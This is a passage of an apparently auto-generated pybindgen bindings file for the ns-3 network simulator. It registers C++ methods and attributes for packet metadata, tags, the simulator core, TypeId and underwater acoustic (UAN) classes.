[param('uint32_t', 'end')])
## packet-metadata.h (module 'network'): void ns3::PacketMetadata::AddTrailer(ns3::Trailer const & trailer, uint32_t size) [member function]
cls.add_method('AddTrailer',
'void',
[param('ns3::Trailer const &', 'trailer'), param('uint32_t', 'size')])
## packet-metadata.h (module 'network'): ns3::PacketMetadata::ItemIterator ns3::PacketMetadata::BeginItem(ns3::Buffer buffer) const [member function]
cls.add_method('BeginItem',
'ns3::PacketMetadata::ItemIterator',
[param('ns3::Buffer', 'buffer')],
is_const=True)
## packet-metadata.h (module 'network'): ns3::PacketMetadata ns3::PacketMetadata::CreateFragment(uint32_t start, uint32_t end) const [member function]
cls.add_method('CreateFragment',
'ns3::PacketMetadata',
[param('uint32_t', 'start'), param('uint32_t', 'end')],
is_const=True)
## packet-metadata.h (module 'network'): uint32_t ns3::PacketMetadata::Deserialize(uint8_t const * buffer, uint32_t size) [member function]
cls.add_method('Deserialize',
'uint32_t',
[param('uint8_t const *', 'buffer'), param('uint32_t', 'size')])
## packet-metadata.h (module 'network'): static void ns3::PacketMetadata::Enable() [member function]
cls.add_method('Enable',
'void',
[],
is_static=True)
## packet-metadata.h (module 'network'): static void ns3::PacketMetadata::EnableChecking() [member function]
cls.add_method('EnableChecking',
'void',
[],
is_static=True)
## packet-metadata.h (module 'network'): uint32_t ns3::PacketMetadata::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True)
## packet-metadata.h (module 'network'): uint64_t ns3::PacketMetadata::GetUid() const [member function]
cls.add_method('GetUid',
'uint64_t',
[],
is_const=True)
## packet-metadata.h (module 'network'): void ns3::PacketMetadata::RemoveAtEnd(uint32_t end) [member function]
cls.add_method('RemoveAtEnd',
'void',
[param('uint32_t', 'end')])
## packet-metadata.h (module 'network'): void ns3::PacketMetadata::RemoveAtStart(uint32_t start) [member function]
cls.add_method('RemoveAtStart',
'void',
[param('uint32_t', 'start')])
## packet-metadata.h (module 'network'): void ns3::PacketMetadata::RemoveHeader(ns3::Header const & header, uint32_t size) [member function]
cls.add_method('RemoveHeader',
'void',
[param('ns3::Header const &', 'header'), param('uint32_t', 'size')])
## packet-metadata.h (module 'network'): void ns3::PacketMetadata::RemoveTrailer(ns3::Trailer const & trailer, uint32_t size) [member function]
cls.add_method('RemoveTrailer',
'void',
[param('ns3::Trailer const &', 'trailer'), param('uint32_t', 'size')])
## packet-metadata.h (module 'network'): uint32_t ns3::PacketMetadata::Serialize(uint8_t * buffer, uint32_t maxSize) const [member function]
cls.add_method('Serialize',
'uint32_t',
[param('uint8_t *', 'buffer'), param('uint32_t', 'maxSize')],
is_const=True)
return
def register_Ns3PacketMetadataItem_methods(root_module, cls):
## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item::Item() [constructor]
cls.add_constructor([])
## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item::Item(ns3::PacketMetadata::Item const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PacketMetadata::Item const &', 'arg0')])
## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item::current [variable]
cls.add_instance_attribute('current', 'ns3::Buffer::Iterator', is_const=False)
## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item::currentSize [variable]
cls.add_instance_attribute('currentSize', 'uint32_t', is_const=False)
## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item::currentTrimedFromEnd [variable]
cls.add_instance_attribute('currentTrimedFromEnd', 'uint32_t', is_const=False)
## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item::currentTrimedFromStart [variable]
cls.add_instance_attribute('currentTrimedFromStart', 'uint32_t', is_const=False)
## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item::isFragment [variable]
cls.add_instance_attribute('isFragment', 'bool', is_const=False)
## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item::tid [variable]
cls.add_instance_attribute('tid', 'ns3::TypeId', is_const=False)
return
def register_Ns3PacketMetadataItemIterator_methods(root_module, cls):
## packet-metadata.h (module 'network'): ns3::PacketMetadata::ItemIterator::ItemIterator(ns3::PacketMetadata::ItemIterator const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PacketMetadata::ItemIterator const &', 'arg0')])
## packet-metadata.h (module 'network'): ns3::PacketMetadata::ItemIterator::ItemIterator(ns3::PacketMetadata const * metadata, ns3::Buffer buffer) [constructor]
cls.add_constructor([param('ns3::PacketMetadata const *', 'metadata'), param('ns3::Buffer', 'buffer')])
## packet-metadata.h (module 'network'): bool ns3::PacketMetadata::ItemIterator::HasNext() const [member function]
cls.add_method('HasNext',
'bool',
[],
is_const=True)
## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item ns3::PacketMetadata::ItemIterator::Next() [member function]
cls.add_method('Next',
'ns3::PacketMetadata::Item',
[])
return
def register_Ns3PacketTagIterator_methods(root_module, cls):
## packet.h (module 'network'): ns3::PacketTagIterator::PacketTagIterator(ns3::PacketTagIterator const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PacketTagIterator const &', 'arg0')])
## packet.h (module 'network'): bool ns3::PacketTagIterator::HasNext() const [member function]
cls.add_method('HasNext',
'bool',
[],
is_const=True)
## packet.h (module 'network'): ns3::PacketTagIterator::Item ns3::PacketTagIterator::Next() [member function]
cls.add_method('Next',
'ns3::PacketTagIterator::Item',
[])
return
def register_Ns3PacketTagIteratorItem_methods(root_module, cls):
## packet.h (module 'network'): ns3::PacketTagIterator::Item::Item(ns3::PacketTagIterator::Item const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PacketTagIterator::Item const &', 'arg0')])
## packet.h (module 'network'): void ns3::PacketTagIterator::Item::GetTag(ns3::Tag & tag) const [member function]
cls.add_method('GetTag',
'void',
[param('ns3::Tag &', 'tag')],
is_const=True)
## packet.h (module 'network'): ns3::TypeId ns3::PacketTagIterator::Item::GetTypeId() const [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_const=True)
return
def register_Ns3PacketTagList_methods(root_module, cls):
## packet-tag-list.h (module 'network'): ns3::PacketTagList::PacketTagList() [constructor]
cls.add_constructor([])
## packet-tag-list.h (module 'network'): ns3::PacketTagList::PacketTagList(ns3::PacketTagList const & o) [copy constructor]
cls.add_constructor([param('ns3::PacketTagList const &', 'o')])
## packet-tag-list.h (module 'network'): void ns3::PacketTagList::Add(ns3::Tag const & tag) const [member function]
cls.add_method('Add',
'void',
[param('ns3::Tag const &', 'tag')],
is_const=True)
## packet-tag-list.h (module 'network'): ns3::PacketTagList::TagData const * ns3::PacketTagList::Head() const [member function]
cls.add_method('Head',
'ns3::PacketTagList::TagData const *',
[],
is_const=True)
## packet-tag-list.h (module 'network'): bool ns3::PacketTagList::Peek(ns3::Tag & tag) const [member function]
cls.add_method('Peek',
'bool',
[param('ns3::Tag &', 'tag')],
is_const=True)
## packet-tag-list.h (module 'network'): bool ns3::PacketTagList::Remove(ns3::Tag & tag) [member function]
cls.add_method('Remove',
'bool',
[param('ns3::Tag &', 'tag')])
## packet-tag-list.h (module 'network'): void ns3::PacketTagList::RemoveAll() [member function]
cls.add_method('RemoveAll',
'void',
[])
return
def register_Ns3PacketTagListTagData_methods(root_module, cls):
## packet-tag-list.h (module 'network'): ns3::PacketTagList::TagData::TagData() [constructor]
cls.add_constructor([])
## packet-tag-list.h (module 'network'): ns3::PacketTagList::TagData::TagData(ns3::PacketTagList::TagData const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PacketTagList::TagData const &', 'arg0')])
## packet-tag-list.h (module 'network'): ns3::PacketTagList::TagData::count [variable]
cls.add_instance_attribute('count', 'uint32_t', is_const=False)
## packet-tag-list.h (module 'network'): ns3::PacketTagList::TagData::data [variable]
cls.add_instance_attribute('data', 'uint8_t [ 20 ]', is_const=False)
## packet-tag-list.h (module 'network'): ns3::PacketTagList::TagData::next [variable]
cls.add_instance_attribute('next', 'ns3::PacketTagList::TagData *', is_const=False)
## packet-tag-list.h (module 'network'): ns3::PacketTagList::TagData::tid [variable]
cls.add_instance_attribute('tid', 'ns3::TypeId', is_const=False)
return
def register_Ns3Reservation_methods(root_module, cls):
## uan-mac-rc.h (module 'uan'): ns3::Reservation::Reservation(ns3::Reservation const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Reservation const &', 'arg0')])
## uan-mac-rc.h (module 'uan'): ns3::Reservation::Reservation() [constructor]
cls.add_constructor([])
## uan-mac-rc.h (module 'uan'): ns3::Reservation::Reservation(std::list<std::pair<ns3::Ptr<ns3::Packet>, ns3::UanAddress>, std::allocator<std::pair<ns3::Ptr<ns3::Packet>, ns3::UanAddress> > > & list, uint8_t frameNo, uint32_t maxPkts=0) [constructor]
cls.add_constructor([param('std::list< std::pair< ns3::Ptr< ns3::Packet >, ns3::UanAddress > > &', 'list'), param('uint8_t', 'frameNo'), param('uint32_t', 'maxPkts', default_value='0')])
## uan-mac-rc.h (module 'uan'): void ns3::Reservation::AddTimestamp(ns3::Time t) [member function]
cls.add_method('AddTimestamp',
'void',
[param('ns3::Time', 't')])
## uan-mac-rc.h (module 'uan'): uint8_t ns3::Reservation::GetFrameNo() const [member function]
cls.add_method('GetFrameNo',
'uint8_t',
[],
is_const=True)
## uan-mac-rc.h (module 'uan'): uint32_t ns3::Reservation::GetLength() const [member function]
cls.add_method('GetLength',
'uint32_t',
[],
is_const=True)
## uan-mac-rc.h (module 'uan'): uint32_t ns3::Reservation::GetNoFrames() const [member function]
cls.add_method('GetNoFrames',
'uint32_t',
[],
is_const=True)
## uan-mac-rc.h (module 'uan'): std::list<std::pair<ns3::Ptr<ns3::Packet>, ns3::UanAddress>, std::allocator<std::pair<ns3::Ptr<ns3::Packet>, ns3::UanAddress> > > const & ns3::Reservation::GetPktList() const [member function]
cls.add_method('GetPktList',
'std::list< std::pair< ns3::Ptr< ns3::Packet >, ns3::UanAddress > > const &',
[],
is_const=True)
## uan-mac-rc.h (module 'uan'): uint8_t ns3::Reservation::GetRetryNo() const [member function]
cls.add_method('GetRetryNo',
'uint8_t',
[],
is_const=True)
## uan-mac-rc.h (module 'uan'): ns3::Time ns3::Reservation::GetTimestamp(uint8_t n) const [member function]
cls.add_method('GetTimestamp',
'ns3::Time',
[param('uint8_t', 'n')],
is_const=True)
## uan-mac-rc.h (module 'uan'): void ns3::Reservation::IncrementRetry() [member function]
cls.add_method('IncrementRetry',
'void',
[])
## uan-mac-rc.h (module 'uan'): bool ns3::Reservation::IsTransmitted() const [member function]
cls.add_method('IsTransmitted',
'bool',
[],
is_const=True)
## uan-mac-rc.h (module 'uan'): void ns3::Reservation::SetFrameNo(uint8_t fn) [member function]
cls.add_method('SetFrameNo',
'void',
[param('uint8_t', 'fn')])
## uan-mac-rc.h (module 'uan'): void ns3::Reservation::SetTransmitted(bool t=true) [member function]
cls.add_method('SetTransmitted',
'void',
[param('bool', 't', default_value='true')])
return
def register_Ns3SimpleRefCount__Ns3Object_Ns3ObjectBase_Ns3ObjectDeleter_methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter>::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter>::SimpleRefCount(ns3::SimpleRefCount<ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter> const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter>::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3Simulator_methods(root_module, cls):
## simulator.h (module 'core'): ns3::Simulator::Simulator(ns3::Simulator const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Simulator const &', 'arg0')])
## simulator.h (module 'core'): static void ns3::Simulator::Cancel(ns3::EventId const & id) [member function]
cls.add_method('Cancel',
'void',
[param('ns3::EventId const &', 'id')],
is_static=True)
## simulator.h (module 'core'): static void ns3::Simulator::Destroy() [member function]
cls.add_method('Destroy',
'void',
[],
is_static=True)
## simulator.h (module 'core'): static uint32_t ns3::Simulator::GetContext() [member function]
cls.add_method('GetContext',
'uint32_t',
[],
is_static=True)
## simulator.h (module 'core'): static ns3::Time ns3::Simulator::GetDelayLeft(ns3::EventId const & id) [member function]
cls.add_method('GetDelayLeft',
'ns3::Time',
[param('ns3::EventId const &', 'id')],
is_static=True)
## simulator.h (module 'core'): static ns3::Ptr<ns3::SimulatorImpl> ns3::Simulator::GetImplementation() [member function]
cls.add_method('GetImplementation',
'ns3::Ptr< ns3::SimulatorImpl >',
[],
is_static=True)
## simulator.h (module 'core'): static ns3::Time ns3::Simulator::GetMaximumSimulationTime() [member function]
cls.add_method('GetMaximumSimulationTime',
'ns3::Time',
[],
is_static=True)
## simulator.h (module 'core'): static uint32_t ns3::Simulator::GetSystemId() [member function]
cls.add_method('GetSystemId',
'uint32_t',
[],
is_static=True)
## simulator.h (module 'core'): static bool ns3::Simulator::IsExpired(ns3::EventId const & id) [member function]
cls.add_method('IsExpired',
'bool',
[param('ns3::EventId const &', 'id')],
is_static=True)
## simulator.h (module 'core'): static bool ns3::Simulator::IsFinished() [member function]
cls.add_method('IsFinished',
'bool',
[],
is_static=True)
## simulator.h (module 'core'): static ns3::Time ns3::Simulator::Now() [member function]
cls.add_method('Now',
'ns3::Time',
[],
is_static=True)
## simulator.h (module 'core'): static void ns3::Simulator::Remove(ns3::EventId const & id) [member function]
cls.add_method('Remove',
'void',
[param('ns3::EventId const &', 'id')],
is_static=True)
## simulator.h (module 'core'): static void ns3::Simulator::SetImplementation(ns3::Ptr<ns3::SimulatorImpl> impl) [member function]
cls.add_method('SetImplementation',
'void',
[param('ns3::Ptr< ns3::SimulatorImpl >', 'impl')],
is_static=True)
## simulator.h (module 'core'): static void ns3::Simulator::SetScheduler(ns3::ObjectFactory schedulerFactory) [member function]
cls.add_method('SetScheduler',
'void',
[param('ns3::ObjectFactory', 'schedulerFactory')],
is_static=True)
## simulator.h (module 'core'): static void ns3::Simulator::Stop() [member function]
cls.add_method('Stop',
'void',
[],
is_static=True)
## simulator.h (module 'core'): static void ns3::Simulator::Stop(ns3::Time const & time) [member function]
cls.add_method('Stop',
'void',
[param('ns3::Time const &', 'time')],
is_static=True)
return
def register_Ns3Tag_methods(root_module, cls):
## tag.h (module 'network'): ns3::Tag::Tag() [constructor]
cls.add_constructor([])
## tag.h (module 'network'): ns3::Tag::Tag(ns3::Tag const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Tag const &', 'arg0')])
## tag.h (module 'network'): void ns3::Tag::Deserialize(ns3::TagBuffer i) [member function]
cls.add_method('Deserialize',
'void',
[param('ns3::TagBuffer', 'i')],
is_pure_virtual=True, is_virtual=True)
## tag.h (module 'network'): uint32_t ns3::Tag::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## tag.h (module 'network'): static ns3::TypeId ns3::Tag::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## tag.h (module 'network'): void ns3::Tag::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## tag.h (module 'network'): void ns3::Tag::Serialize(ns3::TagBuffer i) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::TagBuffer', 'i')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3TagBuffer_methods(root_module, cls):
## tag-buffer.h (module 'network'): ns3::TagBuffer::TagBuffer(ns3::TagBuffer const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TagBuffer const &', 'arg0')])
## tag-buffer.h (module 'network'): ns3::TagBuffer::TagBuffer(uint8_t * start, uint8_t * end) [constructor]
cls.add_constructor([param('uint8_t *', 'start'), param('uint8_t *', 'end')])
## tag-buffer.h (module 'network'): void ns3::TagBuffer::CopyFrom(ns3::TagBuffer o) [member function]
cls.add_method('CopyFrom',
'void',
[param('ns3::TagBuffer', 'o')])
## tag-buffer.h (module 'network'): void ns3::TagBuffer::Read(uint8_t * buffer, uint32_t size) [member function]
cls.add_method('Read',
'void',
[param('uint8_t *', 'buffer'), param('uint32_t', 'size')])
## tag-buffer.h (module 'network'): double ns3::TagBuffer::ReadDouble() [member function]
cls.add_method('ReadDouble',
'double',
[])
## tag-buffer.h (module 'network'): uint16_t ns3::TagBuffer::ReadU16() [member function]
cls.add_method('ReadU16',
'uint16_t',
[])
## tag-buffer.h (module 'network'): uint32_t ns3::TagBuffer::ReadU32() [member function]
cls.add_method('ReadU32',
'uint32_t',
[])
## tag-buffer.h (module 'network'): uint64_t ns3::TagBuffer::ReadU64() [member function]
cls.add_method('ReadU64',
'uint64_t',
[])
## tag-buffer.h (module 'network'): uint8_t ns3::TagBuffer::ReadU8() [member function]
cls.add_method('ReadU8',
'uint8_t',
[])
## tag-buffer.h (module 'network'): void ns3::TagBuffer::TrimAtEnd(uint32_t trim) [member function]
cls.add_method('TrimAtEnd',
'void',
[param('uint32_t', 'trim')])
## tag-buffer.h (module 'network'): void ns3::TagBuffer::Write(uint8_t const * buffer, uint32_t size) [member function]
cls.add_method('Write',
'void',
[param('uint8_t const *', 'buffer'), param('uint32_t', 'size')])
## tag-buffer.h (module 'network'): void ns3::TagBuffer::WriteDouble(double v) [member function]
cls.add_method('WriteDouble',
'void',
[param('double', 'v')])
## tag-buffer.h (module 'network'): void ns3::TagBuffer::WriteU16(uint16_t data) [member function]
cls.add_method('WriteU16',
'void',
[param('uint16_t', 'data')])
## tag-buffer.h (module 'network'): void ns3::TagBuffer::WriteU32(uint32_t data) [member function]
cls.add_method('WriteU32',
'void',
[param('uint32_t', 'data')])
## tag-buffer.h (module 'network'): void ns3::TagBuffer::WriteU64(uint64_t v) [member function]
cls.add_method('WriteU64',
'void',
[param('uint64_t', 'v')])
## tag-buffer.h (module 'network'): void ns3::TagBuffer::WriteU8(uint8_t v) [member function]
cls.add_method('WriteU8',
'void',
[param('uint8_t', 'v')])
return
def register_Ns3Tap_methods(root_module, cls):
## uan-prop-model.h (module 'uan'): ns3::Tap::Tap(ns3::Tap const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Tap const &', 'arg0')])
## uan-prop-model.h (module 'uan'): ns3::Tap::Tap() [constructor]
cls.add_constructor([])
## uan-prop-model.h (module 'uan'): ns3::Tap::Tap(ns3::Time delay, std::complex<double> amp) [constructor]
cls.add_constructor([param('ns3::Time', 'delay'), param('std::complex< double >', 'amp')])
## uan-prop-model.h (module 'uan'): std::complex<double> ns3::Tap::GetAmp() const [member function]
cls.add_method('GetAmp',
'std::complex< double >',
[],
is_const=True)
## uan-prop-model.h (module 'uan'): ns3::Time ns3::Tap::GetDelay() const [member function]
cls.add_method('GetDelay',
'ns3::Time',
[],
is_const=True)
return
def register_Ns3TracedValue__Double_methods(root_module, cls):
## traced-value.h (module 'core'): ns3::TracedValue<double>::TracedValue() [constructor]
cls.add_constructor([])
## traced-value.h (module 'core'): ns3::TracedValue<double>::TracedValue(ns3::TracedValue<double> const & o) [copy constructor]
cls.add_constructor([param('ns3::TracedValue< double > const &', 'o')])
## traced-value.h (module 'core'): ns3::TracedValue<double>::TracedValue(double const & v) [constructor]
cls.add_constructor([param('double const &', 'v')])
## traced-value.h (module 'core'): void ns3::TracedValue<double>::Connect(ns3::CallbackBase const & cb, std::basic_string<char,std::char_traits<char>,std::allocator<char> > path) [member function]
cls.add_method('Connect',
'void',
[param('ns3::CallbackBase const &', 'cb'), param('std::string', 'path')])
## traced-value.h (module 'core'): void ns3::TracedValue<double>::ConnectWithoutContext(ns3::CallbackBase const & cb) [member function]
cls.add_method('ConnectWithoutContext',
'void',
[param('ns3::CallbackBase const &', 'cb')])
## traced-value.h (module 'core'): void ns3::TracedValue<double>::Disconnect(ns3::CallbackBase const & cb, std::basic_string<char,std::char_traits<char>,std::allocator<char> > path) [member function]
cls.add_method('Disconnect',
'void',
[param('ns3::CallbackBase const &', 'cb'), param('std::string', 'path')])
## traced-value.h (module 'core'): void ns3::TracedValue<double>::DisconnectWithoutContext(ns3::CallbackBase const & cb) [member function]
cls.add_method('DisconnectWithoutContext',
'void',
[param('ns3::CallbackBase const &', 'cb')])
## traced-value.h (module 'core'): double ns3::TracedValue<double>::Get() const [member function]
cls.add_method('Get',
'double',
[],
is_const=True)
## traced-value.h (module 'core'): void ns3::TracedValue<double>::Set(double const & v) [member function]
cls.add_method('Set',
'void',
[param('double const &', 'v')])
return
def register_Ns3TypeId_methods(root_module, cls):
cls.add_binary_comparison_operator('<')
cls.add_binary_comparison_operator('!=')
cls.add_output_stream_operator()
cls.add_binary_comparison_operator('==')
## type-id.h (module 'core'): ns3::TypeId::TypeId(char const * name) [constructor]
cls.add_constructor([param('char const *', 'name')])
## type-id.h (module 'core'): ns3::TypeId::TypeId() [constructor]
cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeId::TypeId(ns3::TypeId const & o) [copy constructor]
cls.add_constructor([param('ns3::TypeId const &', 'o')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::AddAttribute(std::string name, std::string help, ns3::AttributeValue const & initialValue, ns3::Ptr<ns3::AttributeAccessor const> accessor, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('AddAttribute',
'ns3::TypeId',
[param('std::string', 'name'), param('std::string', 'help'), param('ns3::AttributeValue const &', 'initialValue'), param('ns3::Ptr< ns3::AttributeAccessor const >', 'accessor'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::AddAttribute(std::string name, std::string help, uint32_t flags, ns3::AttributeValue const & initialValue, ns3::Ptr<ns3::AttributeAccessor const> accessor, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('AddAttribute',
'ns3::TypeId',
[param('std::string', 'name'), param('std::string', 'help'), param('uint32_t', 'flags'), param('ns3::AttributeValue const &', 'initialValue'), param('ns3::Ptr< ns3::AttributeAccessor const >', 'accessor'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::AddTraceSource(std::string name, std::string help, ns3::Ptr<ns3::TraceSourceAccessor const> accessor) [member function]
cls.add_method('AddTraceSource',
'ns3::TypeId',
[param('std::string', 'name'), param('std::string', 'help'), param('ns3::Ptr< ns3::TraceSourceAccessor const >', 'accessor')])
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation ns3::TypeId::GetAttribute(uint32_t i) const [member function]
cls.add_method('GetAttribute',
'ns3::TypeId::AttributeInformation',
[param('uint32_t', 'i')],
is_const=True)
## type-id.h (module 'core'): std::string ns3::TypeId::GetAttributeFullName(uint32_t i) const [member function]
cls.add_method('GetAttributeFullName',
'std::string',
[param('uint32_t', 'i')],
is_const=True)
## type-id.h (module 'core'): uint32_t ns3::TypeId::GetAttributeN() const [member function]
cls.add_method('GetAttributeN',
'uint32_t',
[],
is_const=True)
## type-id.h (module 'core'): ns3::Callback<ns3::ObjectBase*,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> ns3::TypeId::GetConstructor() const [member function]
cls.add_method('GetConstructor',
'ns3::Callback< ns3::ObjectBase *, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >',
[],
is_const=True)
## type-id.h (module 'core'): std::string ns3::TypeId::GetGroupName() const [member function]
cls.add_method('GetGroupName',
'std::string',
[],
is_const=True)
## type-id.h (module 'core'): std::string ns3::TypeId::GetName() const [member function]
cls.add_method('GetName',
'std::string',
[],
is_const=True)
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::GetParent() const [member function]
cls.add_method('GetParent',
'ns3::TypeId',
[],
is_const=True)
## type-id.h (module 'core'): static ns3::TypeId ns3::TypeId::GetRegistered(uint32_t i) [member function]
cls.add_method('GetRegistered',
'ns3::TypeId',
[param('uint32_t', 'i')],
is_static=True)
## type-id.h (module 'core'): static uint32_t ns3::TypeId::GetRegisteredN() [member function]
cls.add_method('GetRegisteredN',
'uint32_t',
[],
is_static=True)
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation ns3::TypeId::GetTraceSource(uint32_t i) const [member function]
cls.add_method('GetTraceSource',
'ns3::TypeId::TraceSourceInformation',
[param('uint32_t', 'i')],
is_const=True)
## type-id.h (module 'core'): uint32_t ns3::TypeId::GetTraceSourceN() const [member function]
cls.add_method('GetTraceSourceN',
'uint32_t',
[],
is_const=True)
## type-id.h (module 'core'): uint16_t ns3::TypeId::GetUid() const [member function]
cls.add_method('GetUid',
'uint16_t',
[],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::HasConstructor() const [member function]
cls.add_method('HasConstructor',
'bool',
[],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::HasParent() const [member function]
cls.add_method('HasParent',
'bool',
[],
is_const=True)
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::HideFromDocumentation() [member function]
cls.add_method('HideFromDocumentation',
'ns3::TypeId',
[])
## type-id.h (module 'core'): bool ns3::TypeId::IsChildOf(ns3::TypeId other) const [member function]
cls.add_method('IsChildOf',
'bool',
[param('ns3::TypeId', 'other')],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::LookupAttributeByName(std::string name, ns3::TypeId::AttributeInformation * info) const [member function]
cls.add_method('LookupAttributeByName',
'bool',
[param('std::string', 'name'), param('ns3::TypeId::AttributeInformation *', 'info', transfer_ownership=False)],
is_const=True)
## type-id.h (module 'core'): static ns3::TypeId ns3::TypeId::LookupByName(std::string name) [member function]
cls.add_method('LookupByName',
'ns3::TypeId',
[param('std::string', 'name')],
is_static=True)
## type-id.h (module 'core'): ns3::Ptr<ns3::TraceSourceAccessor const> ns3::TypeId::LookupTraceSourceByName(std::string name) const [member function]
cls.add_method('LookupTraceSourceByName',
'ns3::Ptr< ns3::TraceSourceAccessor const >',
[param('std::string', 'name')],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::MustHideFromDocumentation() const [member function]
cls.add_method('MustHideFromDocumentation',
'bool',
[],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::SetAttributeInitialValue(uint32_t i, ns3::Ptr<ns3::AttributeValue const> initialValue) [member function]
cls.add_method('SetAttributeInitialValue',
'bool',
[param('uint32_t', 'i'), param('ns3::Ptr< ns3::AttributeValue const >', 'initialValue')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::SetGroupName(std::string groupName) [member function]
cls.add_method('SetGroupName',
'ns3::TypeId',
[param('std::string', 'groupName')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::SetParent(ns3::TypeId tid) [member function]
cls.add_method('SetParent',
'ns3::TypeId',
[param('ns3::TypeId', 'tid')])
## type-id.h (module 'core'): void ns3::TypeId::SetUid(uint16_t tid) [member function]
cls.add_method('SetUid',
'void',
[param('uint16_t', 'tid')])
return
def register_Ns3TypeIdAttributeInformation_methods(root_module, cls):
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::AttributeInformation() [constructor]
cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::AttributeInformation(ns3::TypeId::AttributeInformation const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TypeId::AttributeInformation const &', 'arg0')])
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::accessor [variable]
cls.add_instance_attribute('accessor', 'ns3::Ptr< ns3::AttributeAccessor const >', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::checker [variable]
cls.add_instance_attribute('checker', 'ns3::Ptr< ns3::AttributeChecker const >', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::flags [variable]
cls.add_instance_attribute('flags', 'uint32_t', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::help [variable]
cls.add_instance_attribute('help', 'std::string', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::initialValue [variable]
cls.add_instance_attribute('initialValue', 'ns3::Ptr< ns3::AttributeValue const >', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::name [variable]
cls.add_instance_attribute('name', 'std::string', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::originalInitialValue [variable]
cls.add_instance_attribute('originalInitialValue', 'ns3::Ptr< ns3::AttributeValue const >', is_const=False)
return
def register_Ns3TypeIdTraceSourceInformation_methods(root_module, cls):
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::TraceSourceInformation() [constructor]
cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::TraceSourceInformation(ns3::TypeId::TraceSourceInformation const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TypeId::TraceSourceInformation const &', 'arg0')])
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::accessor [variable]
cls.add_instance_attribute('accessor', 'ns3::Ptr< ns3::TraceSourceAccessor const >', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::help [variable]
cls.add_instance_attribute('help', 'std::string', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::name [variable]
cls.add_instance_attribute('name', 'std::string', is_const=False)
return
def register_Ns3UanAddress_methods(root_module, cls):
cls.add_binary_comparison_operator('<')
cls.add_binary_comparison_operator('!=')
cls.add_output_stream_operator()
cls.add_binary_comparison_operator('==')
